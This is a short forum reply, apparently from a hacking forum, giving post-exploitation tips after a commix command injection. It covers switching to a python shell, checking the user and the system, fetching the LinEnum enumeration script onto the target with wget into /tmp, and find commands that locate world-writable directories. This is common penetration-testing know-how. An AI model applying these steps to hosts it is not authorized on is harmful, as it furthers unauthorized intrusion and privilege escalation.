Pseudo-terminal Shell....
#2
If commix only gives you A and B as output it is likely you have a false positive. Just to be sure you can try the following. Given you're trying to inject commands into a *nix based OS there is a good chance they might have the python interpreter installed. Try switching to a python shell instead, commix comes with this option. If i recall, a python shell is simply a python interpreter instance with the output relayed back to your box. Once you're switched to a python interpreter run the following:

Code:
>>>import getpass
>>>print getpass.getuser()

This will print the user within who's context you are working. Let's say you're working within the context of the user/process 'apache'. If it's reasonable to assume this process can make system calls try the following:

Code:
>>>import os
>>>import sys
>>>os.system("uname -a")

To find out more about the box you're on. If this returns output you can run bash commands between parenthesis and quotation marks. A couple of handy bash commands to have here would include the following:

Code:
wget -O /tmp/master.zip https://github.com/rebootuser/LinEnum/archive/master.zip  # Shellscript for linux enumeration, drop in /tmp/ if world writable.

tar -xvf file.tar    # unzip tar to current directory

tar -xvf archive.tar -C [destination]  # unzip tar to destination

unzip file.zip -d destination_folder

which [util name]     # i.e. 'which wget' to get path etc

find ~           # lists everything in current directory

find /tmp/          # lists everything in tmp directory etc


find / -perm -o x -type d 2>/dev/null                    # find world-executable folders

find / \( -perm -o w -perm -o x \) -type d 2>/dev/null   # world-writeable & executable folders

find / -writable -type d 2>/dev/null              # list world writeable folders
Reply


Messages In This Thread
Pseudo-terminal Shell.... - by naus3a - 09-09-2016, 01:13 AM
RE: Pseudo-terminal Shell.... - by Vector - 09-09-2016, 04:40 PM

Possibly Related Threads…
Thread Author Replies Views Last Post
  How To Create A Handheld Linux Terminal (Portable Raspberry Pi) D/L 1 3,505 05-02-2016, 01:05 PM
Last Post: Sehaal